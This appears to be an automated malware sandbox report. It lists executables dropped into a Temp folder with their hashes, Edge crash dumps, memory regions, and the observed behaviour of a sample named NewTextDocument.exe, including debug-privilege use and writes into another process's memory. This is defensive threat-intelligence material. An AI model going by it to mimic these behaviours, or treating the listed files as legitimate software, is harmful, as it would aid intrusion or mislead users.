SHA1 414c0fb506c4463b730a1158146d0039c8b66de6
SHA256 831340ed2f5f3c55c26aa97ee726b239be4675cf34496c8a573df5b2b4015495
SHA512 dc1a441bc68592f02a215bfd80c06d9605779917fecfdc43fd0f6e7e94ea63b0b1f0963c3eb22eeffc1ed40c0484580999dcf6860ed9b0765919bf7bd77dfba3

C:\Users\Admin\AppData\Local\Temp\a\66d9ddcb9dbfe_Build.exe

MD5 df763cc3afd7e98d660e5db9de5b1d95
SHA1 e50abf286735649267da3024aa27544eaf095845
SHA256 aee46fb12d8bd25b4033b3ef7fb04703961e68e6cbc40d6aa410b01b05e4b411
SHA512 a7622cf295023ca9073d3ae239b98268705f1b9ea850bc6c8f6db66f175b546df95a1dd4978bf376af4a6d4568ae0f78b66b3fa885a5146f6692a35c69b879c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 b7e9a3bd17230feb40caee7c16f71f11
SHA1 91353d058d2438e1ee5a2596e1c7d3e79b6bc153
SHA256 17cc61680a083b64297ed07840d6b8153d1315c7268ca86ad9b37517d4083474
SHA512 d5bc4ae673309da7f2fd0ee95de5ca8bc2da1e599f9c734875ffa26dd91945815a22e24c71d100525c8dc68a8e32986e5548c77dd474465a427f2df421e1d600

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\f557236a-8302-4d97-a087-203ac65f2eb6.dmp

MD5 f1d0d8a26229bdc0be15c1ff955ad34f
SHA1 a3d9d6534706c4eabba2104fe9404c80f7c0d3a4
SHA256 618953c1ce6a173dd2f16a8ee7a76c8268e741f59621f780f52dc201013b1c05
SHA512 2575231c50760f0162830d2daf577eb7a590458d2c58664394fee33112c22cc14d504c35d62a8832bba7fa92c8592a00bf138a1ae66cb79b95fb9f46b64e8cc4

C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe

MD5 387d4b12ac9e87b9db76589fcca2b937
SHA1 4a51340e1817d7ab2c739b1237c541b58e3b7c9a
SHA256 30d91ef269ca652f181ba1985cf2cf8a5790305927c6887e0c298c38ae87afcf
SHA512 35bd0a53169d56a12260ec280977fdf0e3c07b41baa836a931667aaaeffebad902f7fb1b61b3d33072a02823a959a54a6327aed57580b970bc0bcee464cd4f87

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 c251965f2d3af87e21d766351dcf9e8d
SHA1 8cb9864ac87264228fa6ec2aa8af25276ee10d78
SHA256 174e6a498deac47f767923de085d4e219445f88a6997df065b02d7eb816d72a4
SHA512 a2a807f3f64fc0c797572e5fd8d9f9ecfb0250d11f6d39a06b29b5660e074a0f2a6f195a21536127349f9c955d3e0a888e02ea47f2d8c6d0bf25475756c57719

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\81919a83-847c-4d34-b747-09a64529b6c4.dmp

MD5 466836e189646335275f771abdcc685e
SHA1 ad043916b3f021b981e31503b31abc8436c8fe89
SHA256 b226ad49de8977c0547b6367796141b53a6fe81c36607bc7c7d85604d1faf965
SHA512 415f937cc9fa6ee7e89832603fd845b258962d979d9d0b54ef3a35fab4168df197c2c95ee4df5a6ea3eaa7d4382e07783565ac63e9630d3b6367573147ad8239

C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe

MD5 7a8463b22eb60bf18f4df8444e006d96
SHA1 f1577856bf96eea03ba84a5fd85dfc9426d60def
SHA256 07dfcd4aad4d53de15bd688a17d31ce50d591173d60fa2cb629b9ed94179cc2a
SHA512 5bc787b6e6cc02c96481bfa87fa3336ba53aa596c1c4b053de40e18d400305481a7059a71c9ee9ad1e6ce3260a743860595a7cddbdbcffd7dfeb8eed06de9779

C:\Users\Admin\AppData\Local\Temp\a\Accounts.exe

MD5 8a4f0f41b42e3f0027066f418e5436c5
SHA1 3ce8dec5bcfd824805e40ec6f9d43ac45b6f029c
SHA256 a0b724fea63d02a4b665dfb5c047da345e949385758e6bdc20b3c42951c549e4
SHA512 19c0c02ba0fa3899f1f67cc19daab651a4384217cf81f50c3b3774cae09c5f2117bc2d43698866156e93a00948014345f96db1c8a637daf0a146862531ce3ef2

C:\Users\Admin\AppData\Local\Temp\a\Meeting.sfx.exe

MD5 1a679e0ccedfb2c3b8ebaf8d9b22f96a
SHA1 6ae0ff6690d0a857d145f671589a97620c1e43e5
SHA256 d16eb8da5c5ce99f1a2e38677eff8d2ae532cb1ad0eddf10a311583004675960
SHA512 8e60833f266f1a092846892659b117e06f96d5f7017ce0847333a7ae38f30b2a274bf6fe0ee43d5e94c1aa87a84ce340c4b66de256883bcf2bbc17038353a4d7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 460f20d51f93d7da79e5be4bc3134397
SHA1 0511f833b6c677d4332fc6d1d5179f4518f5b287
SHA256 a7f45af73296be18358e6e679a93d67e0e098a9bed8a84574ad9190566722046
SHA512 3d1670212246334467c1979d09bedbaeb10ab6b369a844578e4ab6d632061a1bbc3f5b2efd81955c9caf3a4cfcb02bafd04526c72b9b0da8593e42f4d2891742

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\34e1b215-af8e-4750-a8af-d60db40e2ac5.dmp

MD5 0e5aa5543d83072489f9db5d6996a3c4
SHA1 01b3869d0b27fa5b33621951aa429465feffc16b
SHA256 4410d62b79720e61d4889b560e4c32a47a3cabe2c7fcb3e91b890470ce76ec79
SHA512 e5b08f9b2cf71920ec2f07f6beaf8df64f93afc752b4ff5e830ea907606e35ff64f683d4b1a64b9c5f70e81f7e56d6af1962a398d68efb90050580be37191444

C:\Users\Admin\AppData\Local\Temp\a\Meeting.exe

MD5 1ebcc328f7d1da17041835b0a960e1fa
SHA1 adf1fe6df61d59ca7ac6232de6ed3c07d6656a8c
SHA256 6779bc4c64850150de694166f4b215ce25bbaca7d60b293fa7bb65e6bdecbc1a
SHA512 0c537e8dbdf5de433f862a31fbcb5a709f7727783cb36f7ed3dcac1acb44d704d5ad570035259022b46a0370754d029f476ae40280983d1586de9098e31a31d6

C:\Users\Admin\AppData\Local\Temp\a\ywp.exe

MD5 6a9213568bc6a19895240ff14fd57329
SHA1 bd18494cb4d7f652bcf9ce187e11ed0eccda65f8
SHA256 5618de81f0a47570c7048019102af4664a7402b657dcc060148243e97159ad97
SHA512 d6c658c22dd0e70f09c0a3d07b656ea6315c39a99bd7855f202447f88359272efdc8cfba17b5243b26fac69b5159ce2cec106f42df22bdb72f948c4f9618335d

memory/7052-23517-0x0000000000750000-0x0000000000C0A000-memory.dmp

memory/6820-23521-0x0000000000400000-0x0000000000480000-memory.dmp

memory/7052-23523-0x0000000000750000-0x0000000000C0A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 cd646216ed7eab2218d1e185722eed94
SHA1 cb3918010a4dbfd5aae4a290dcba7ef40c397cd8
SHA256 68092f16e2a53ced0a0fa8b934fbf49e16b9eabeaba096378f2ad6a502b50efb
SHA512 580f4ea6e55ab124e77a1dcf022ced4abbbb805046b84dcabe9cb2bde38c4014f068c125a4b88cccb09108d9b0d5e52acd1e04d09bdff6959ef661c30267f0f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\122f7b64-79c8-421c-a1f0-a2ea5d540941.dmp

MD5 d67f2c76d795758fb49a947f79c85d92
SHA1 cbcb3a6673d772f33d6431c11e3ca069bd240360
SHA256 76c3d52a2b25c90894cb2a0655b2e7bde946abc7f2fc498e1a0c25407cdd5fb8
SHA512 96fe7cde3e2114ab5893261cf77745ede1197aa71180368cc70b663882510e56e47585ec370913a966f5f7204dd4a9b5e13a06e7be0d4445a37513a7bc66e80f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 c7a9e5380d253a54d98cdc7e3301a402
SHA1 c83bef06d501e466dea225e1040fb135b8143d6e
SHA256 7fab1901508200609896981bd137b470e6fce24fd460c9fbaf75b7e574ea2856
SHA512 06946fb9a435a2c9c380ae385b1b76f88a3d15faf7c6f8fd3e8a9f6ef95e48fef020422ed1a3c0a0572954258835f0ee11fb98f60e2e72aea48b1ce177df8077

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\9be57386-9232-4932-b4b7-aa7cdd47eee8.dmp

MD5 dc0525570780e0c2baed250c7d5ff899
SHA1 0d5c5d4998a3323c0b8ecbdd8f2c12c78af4b291
SHA256 703cb92b79b4034f9d657ad385cbf23872e2683a8f23915bd816dfa17c76ca30
SHA512 6aac232ca699f72e119be02698556551a681c1dad700a1b25896541d027be82e327244578d14fc6677335d3ca423cac1f72670a6f140038ef0206ea1af043b8a

memory/5292-23575-0x0000000000400000-0x0000000000442000-memory.dmp

memory/5292-23576-0x00000000059A0000-0x0000000005A06000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 577f258414da82354c5a879615202791
SHA1 bcbf5331866cc86b0020870b8ddae017a7859a4e
SHA256 0f4d5e866484c7da7c31425ceafc1fd0dfb88efcaa43357d6e409802d85589a8
SHA512 d2882324bc5f1814352d056d74bdf58bc37d3bc96e5ecce981c12de7b7d05c5cfa756baf686a44de0e2eb08d61c19412e0b36f130194c4d1e44312d836b5f17f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\fb559c99-5e3e-434d-a5cf-8c8bbc263a83.dmp

MD5 3c427b0efc569efb57467dd5f13b0e48
SHA1 9f07141589aea57dc03b03867685742199f485b6
SHA256 cc4317afa9c1367a4ab57390f9154a49ac75f4389dc714ef7e5232f4ac44dfca
SHA512 1e0e9e9452e77083cf644d95370dc71a835d5baaf26d3a824b0e9d930df7b7cd023a9e1ec0f5abd437256320787f2b5d3f2b901c393abdef4d43c6fde6bb54a1

memory/38128-23600-0x0000000000400000-0x0000000000440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 a2db3a57f248a8dfec0e78966f08ffa1
SHA1 39292dfca1b3812e31d7d1c760c46dd556ec5279
SHA256 097b3bb8f664f60cdf0bff42acb905e1cc695fa42c10e5f00ce0104ef4c59af7
SHA512 3155cbb9c5a8d6d12def5a6a90d79197122e141b0e6b6f7d199a6b1826885707fb950d016d5d62af35fbd08bd707c93f5b9ca610fa262236a54b67914e3b9d3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\c57f71f3-2501-4ece-8d7c-8cf2cfdab5f0.dmp

MD5 8011738caa28ce9763e27b98a6acfdb1
SHA1 afa577394ee342ee1d172ef77268d3ef7b22613f
SHA256 3623b5f9fa6e9a626bf23dc8bdf29646a1490c397314cd6f6df14348419bf3d3
SHA512 1262335ccd9583d4fc1cd576b727e126ca9df93fbdc898b20b8445a2bff354435419468b0308bcf12bc464cde76eb9a35dc7188c65fa3c56f36ca32bdeb85814

memory/38128-23625-0x00000000068C0000-0x0000000006910000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 014427bd9d2e47455a6293179bbeb8e4
SHA1 73021cec7d4719953b27fa21739799cfeeb65ff9
SHA256 f4fdd86f608c735bd5ecdba8565f84c13c18be28c5d4cd712181608bd1fc5af1
SHA512 1be1c0fdeca5720c0c6f6de9d2bf36e5a60836fd32b986f0e9b0f6f69996844eaa2c769f58158cae49f91856e39bbf1a585575d6a2786794b586d0b9409513ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\b22cd904-c946-42fb-9971-a99937926136.dmp

MD5 651124b6683d012a3ef5e8377c64d02e
SHA1 367a82dbaa18f72de73315760a77a285f72295c7
SHA256 e0897386405fcd1471246a26f07bf3e0f6f97c66759f1b37cc3e01f8009cddac
SHA512 531f4f91d6423fe88674bb7fd7023ad0fb5737f50ac53125f23b596d10b3fa22f0d350d623cbb66b40706a031e29b16bd11e41cccdbf4870c09c2566adca2ee8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\bf094322-3cc5-41e8-80fb-a139aaca695c.dmp

MD5 7a7baaad01344fd9f803f4309d9ea87b
SHA1 fa1d7d529f0f2ae02e76bd7558d31eaf6ecf48f7
SHA256 d8832e78000c9484bb082861f8f5c9f553b34a029fbdd156c5348bab5556b1b7
SHA512 258b224366593e3132648c102f8ef8e2e06fb1db44d2e1837e78f3c8b65043eff4e5dadf963b27b43620d0769dbb287845aa6d34e2c29ee9347f014ace459d5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 90fa1a686687a5587622763d0f273101
SHA1 b79b7f380b8a4e06d1cb1e0d837ae44ab99d3868
SHA256 248368c0386032a211e40d2b309f3f543407e0d16d6c0514b98449294dac363d
SHA512 92c4e993f59cbfffe43145364c2b1bb4b1d309b2082a7e0155a7d82c39261e9cce2971abd27fc7ffadab05f8ef780c3593ec4d779929d9a812980587ed8bbdaf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 bd3363e61dc57d1d078ebd3ea4f5841e
SHA1 4e8fa246140ac15aeb19af365c5ea2b70475d941
SHA256 60eafcbcda7bed0cf3ac85ee57dae96d09e0ccff1c8885090380a42e24d62c4c
SHA512 e78b3b8a1c2b6c759cee1be8ea8d0d2e95b61ee678e33b6f946cb1626a5c5b05d2b62797ada4f14f8e3579fb4bf336e4da50bdede610cee028b8592b16029ce1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\f9cbdce3-c4af-4f4c-85e6-01ab691ff937.dmp

MD5 ff5954062dfd36d866e59b486d1791c0
SHA1 8d0a3d206b4bd1ac052654ce47dd406fbe9a09bd
SHA256 13f6c58ff5a3158f539166b1083181e3dd8ccc0c19465db7b5418eb07d27aff7
SHA512 553d585e78a3c40a2491ad9874f116dcb2c82225ab9df6dfc7aafef851580f56f5b0a108ec45bae08b50724ee315409a65d6526ee2181c4e31794b8f0fae0757

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 67c30ea6aa5b69517ff34a2ccdf05e76
SHA1 3c57a24fcee7d9146fecb72322b8b2db2da651d2
SHA256 3b2f767462d3319a183de77101f7eb9a10dc8bc19679fa6415cca855bcf117c0
SHA512 2779d2ef892743db4cedee7cf9321886ddf6482dfac3fd35cd78fe6aeb9476f69febabb424a10363e0a6e26cfed806397cbea058530e47c22fc3d54cd70fd665

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\fab1ee35-5747-4802-a31e-3414c56e045d.dmp

MD5 4332a7269dbc3f1cf2634ee8b719abfa
SHA1 21e8ac4515578b3e0ffb552d1fd1a72f4baaa878
SHA256 5c50268804f19b7e30a84a9a8ddc2234593aafb6d2a4e67871004dae3c2cb090
SHA512 ffce3993b55f3b73164624a63652dc4998ceb2283ea450569825586a70c453472a8251e90211e33b2848a8a740f1dadc6eca546639cc420549ce50e57164deb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 c47bc2d7130f883efffa79894e896808
SHA1 5c3ee91e64fc2e5123641113d94800070e00d382
SHA256 011c2f1096d821fb89cec320780582645fdf1df0632b9c7959b3a31be8581300
SHA512 60d2512f5136d08ca6b683195bd21403c6349ead621be6810eb2fdadc07bc9b5597ed50cc7fef1003584ea53466e5c073b63bdbde34ff82ec6031571bfe9524e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\ae39179b-5ca6-45d0-8db7-293ac34ee66c.dmp

MD5 46aa61c6331b14a41310b652ce9ae65c
SHA1 48bf5a9cf925185d88b8fc8f611d6664c88027bb
SHA256 38a85a4f5a84e752f0bd49bf8287e4a3dd549fbeeff27f157e876bfa1837f2c2
SHA512 905882c49619f5a158054a57234cc1569c3ec277f24e56fe0f8be5df8e28b69defcbaf3999b1f8027463155b9fd40ff4acb279122cc4db62aa086871c8aa04b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\cce53f9a-184c-459e-8e1c-db7624f0abd2.dmp

MD5 5828740be4e132bb4e49abf5dfe41a73
SHA1 464f02483aed1587157a489b51e715ae96767133
SHA256 d77faefa98ee6cc8d1e9019c5a9f787afc71afb1e733809e21a4f45696a1bfab
SHA512 433fd188562568dd14dbb7a5c491222113854c509a8f188ef142aa9ee4b2977447b577d38224ce73ffe2b3c0ec2039825f670573e18dbd073e63a2ace32c761d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\78958706-0afe-47e5-bf8a-eb9e86451fb3.dmp

MD5 9427aca6e2f69b2fe7de6cc560efca95
SHA1 23d62f4f7a6d3451e39207826e2eef5113eb5c2c
SHA256 bbc95bb301a8249196543594ea3d29b68df762aea4fcd79b0051b13f38a89111
SHA512 ec7ea1691c9439518b63ed14ecc63bb7d28f5d1dba3fc399a856eb5a3e74e74cb4e7022e20b47f4bad36752f66d8502a0619804c651abbba802e4a20f7f3d689

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 fc88e25223f131ad995e0107d034f019
SHA1 f2d6a078e52ab5ae14cc6ae0cc577aec6225ac48
SHA256 b6d0c8771633ea1f819b68e946ec7162049d9f37a660c1130fb5f63bc2b9a38b
SHA512 c17e56216de345839d4c17d4f2cbacdf727b9b6fea70df1a7869519c9d9a4b607dbb6536afaa17228ed54448b5b8a6312ca9f4d3431d51f36a7f58e6c94045a0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\9f9d6f1b-9fe9-4368-bc55-bacc01ee17ee.dmp

MD5 2f9e79eb31e1ea8575377b3d2e7b8b74
SHA1 b8cd3a09993e154d4c7a0c1df15bdb65bfe6be69
SHA256 30e2f71d335c6f826958a24b50ee10cc88a636ee097429c5d00a216ea230818b
SHA512 5eba9f20d3cd34eada849736023bd92b54df347604943184cdcc541ffd006c8e1c5274b9a21aa7ab6ddd3e9aed4768125265444e29e613494b6dff29d3220637

C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe

MD5 7366d8ddcc9fb6721c53f5feef334b1e
SHA1 91f437cf6b6dd98da5ccbb543020b5e6f1f30f27
SHA256 b3b91381d1df6f08d06ac4f74bca4e597b596001966cee4bc4401a46f1b318b0
SHA512 41990b1d6338bdd865f5f3f0915fd85ca3d165d27ca4d2f85e2def8d27d3363a28387689a3d1e4bb3b581ca71b0c2dc62cd54bf9e99537750d2f934ddfb81de1

memory/7976-23852-0x0000000072B10000-0x0000000072B95000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 10959b6a0c0e7ce577fd1db64d28816f
SHA1 382c8ac8918c3a8d3d9652dc2bb0290fe895c3e4
SHA256 db5c2b1ec219ed31e06912f7b39cab934a97a3273acb892a0f05af0fcfeb30a4
SHA512 34f348f499d88d5174655445bda34a312bcfdac5225df726b8c34748538c61c712934d2ae70dd5415356de37abcf93c589314b23d57d194ec4f1cfe400938c73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\b40b8069-2f59-4245-9284-1ff402cca15d.dmp

MD5 f0494eb4c0e651bbbc940db2638e8d50
SHA1 e5fa54cadd0fb77e4c01954f204aaba0606a32ca
SHA256 a9cdd7fac0671e86762b5d632ca9d2dd1b1e7c186ad3eab25dda02a9a2b1650f
SHA512 65d91d43b1776470c32aa492a534cf4f3e0561cb4355560e4156ac328c760b7146443dc03d7b8d4e0feb50c0c7b693376a9fe8420ce5baafd74badd5717b1dc2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\64e64cb7-b577-4383-9913-07b5e6b8f851.dmp

MD5 29f54c94ad9b63b217bfdb7e798ead28
SHA1 08c88288d2678610890ed3d7ac9d2c3f4727f26a
SHA256 f6719c2ad11e68c1d968cccbbad9a5aac5c7bc5b74c1e1ca48a84442e30e45fe
SHA512 7061c6b908451a8d534fd8d72aadd322de958956fe8931889f7ac1b270f6d800cfc885418c9006b7aa117cb6114ea7598ce502d582e0b1f27fb4377aadca87ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\ecdcb9dc-41cc-4960-a71e-28ea37e6d02c.dmp

MD5 57954eb38b0e7c8d7007c8f69258a396
SHA1 4bcbdab9df0a0bb032a1313c0c532ab84ab8eeb9
SHA256 049db39d75c9e6c4470c24e2d91d4e7ebf45930467d963d1c0182335bf09d9b9
SHA512 997d52a1e5e9daae01c52de2a48c966a441b577272bbcfb1a7d81a972dbc971553ef0383aba1dca5f41eb1b9dd789000fa784068dee8b24a9a09d819a4a1957a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 ada00df8ebf29423ac944b873fa69b05
SHA1 54eaf75a8c7362592bbcf5f670b52c404126312c
SHA256 5ce5cc8beb2bd727cea4a2ede74b7cf54eebd7f095e2a648af7340dd64cbb6aa
SHA512 338a39e1c6419e2df056c7f5ae401d278ed54f3d371216f61f933bd06f8009eddf50f5cca048877681fe005f271812890c51bb6ee7651e7cab9b402428a6929f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\840a6147-08b4-47b8-bfa1-2668b8341da9.dmp

MD5 e6bd8559d40afd0962a56eaf5ab9f8cf
SHA1 d21e25372d868c3f5312da6bd87a8b23766de809
SHA256 42a9ecfa2f0be150d0eb7825ced03bd078858f45047cbedb539ab2b45686137e
SHA512 95968f027b1cc9dfefd4632ef1652c44049b93503fd5c018b5945883e63ab9562bb3ff707c7eca9acc8a38ac38cc104b587663a0b525f8385c5da6be70ef96be

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-09 08:54

Reported

2024-09-09 08:56

Platform

win7-20240903-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Windows\system32\WerFault.exe
PID 2540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Windows\system32\WerFault.exe
PID 2540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Windows\system32\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe

"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2540 -s 1076

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp

Files

memory/2540-0-0x000007FEF6263000-0x000007FEF6264000-memory.dmp

memory/2540-1-0x0000000000F30000-0x0000000000F38000-memory.dmp

memory/2540-2-0x000007FEF6260000-0x000007FEF6C4C000-memory.dmp

memory/2540-3-0x000007FEF6263000-0x000007FEF6264000-memory.dmp

memory/2540-4-0x000007FEF6260000-0x000007FEF6C4C000-memory.dmp